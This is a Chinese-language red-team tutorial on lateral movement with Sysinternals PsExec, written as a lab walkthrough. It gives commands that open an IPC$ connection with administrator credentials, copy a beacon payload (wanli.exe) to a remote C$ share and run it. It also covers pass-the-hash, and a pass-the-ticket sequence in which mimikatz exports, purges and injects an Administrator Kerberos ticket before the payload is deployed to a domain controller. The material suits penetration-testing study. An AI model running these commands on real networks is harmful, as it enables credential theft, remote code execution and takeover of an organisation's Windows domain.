内网渗透-【横向移动】PsExec工具远程命令执行横向移动

【横向移动】PsExec工具远程命令执行横向移动

PsExec介绍

psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口， 只需要对方开启admin$共享和ipc$ (该共享默认开启，依赖于445端口)。

但是，假如目标主机开启了防火墙(防火墙禁止445端口连接)， psexec也是不能使用的，会提示找不到网络路径。

由于psexec是Windows提供的工具，所以杀毒软件将其列在白名单中

下载地址：
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

PsExec使用条件

1、具有正确的凭证(内存凭证、账号密码、账号NTLM Hash)
2、能建立IPC链接(也就是需要通过smb认证的)，且目标机器开启了共享(默认开启的)，并且目标 共享中必须有admin$共享

PsExec常用参数

psexec \ip -u administrator -p admin cmd 进⼊半交互式shell
PsExec -accepteula \192.168.108.101 -s cmd.exe 建立交互的shell
psexec \ip - uadministrator -p admin -w c:\cmd 进⼊交互式shell，且c:\是⽬标机器的⼯作⽬录
psexec \ip -u administrator -p admin whoami all 执行命令
psexec \ip -u administrator -p admin -d c:\beacon.exe 执行文件
psexec \ip -u administrator -p admin -h -d c:\beacon.exe UAC的⽤⼾权限执行文件

实验复现

4.1、IPC$下的psexec

上传psexec

建立IPC$连接

net use \192.168.41.150\ipc$ “Admin@123” /user:administrator

返回交互的shell或者执行命令

psexec.exe -accepteula \192.168.41.150 -s cmd.exe 返回交互shell (必须是msf或者远程 到桌面CS不行)
psexec.exe -accepteula \192.168.41.150 -s ipconfig 远程执行命令


远程复制

copy C:\Users\admin\Desktop\wanli.exe \192.168.41.150\C$

远程上线

psexec.exe -accepteula \192.168.41.150 -h -d c:\wanli.exe

4.2、PTH下的psexecs

找到登录的凭证
找到和扫描地址
进行psexec攻击上线

4.3、PTT下的psexec

上传psexec

进行PTT攻击

导出内存的票据

mimikatz.exe “privilege::debug” “sekurlsa::tickets /export”

清除内存中的票据

shell klist purge
mimikatz kerberos::purge
两个都是清除票据

将高权限的票据文件注入内存

mimikatz kerberos::ptt [0;998d7]-2-0-40e10000-Administrator@krbtgt-
HACK.COM.kirbi

查看票据

shell klist
mimikatz kerberos::tgt

远程复制

copy C:\Users\admin\Desktop\wanli.exe \dc.hack.com\C$

远程上线

psexec.exe \dc.hack.com -h -d c:\wanli.exe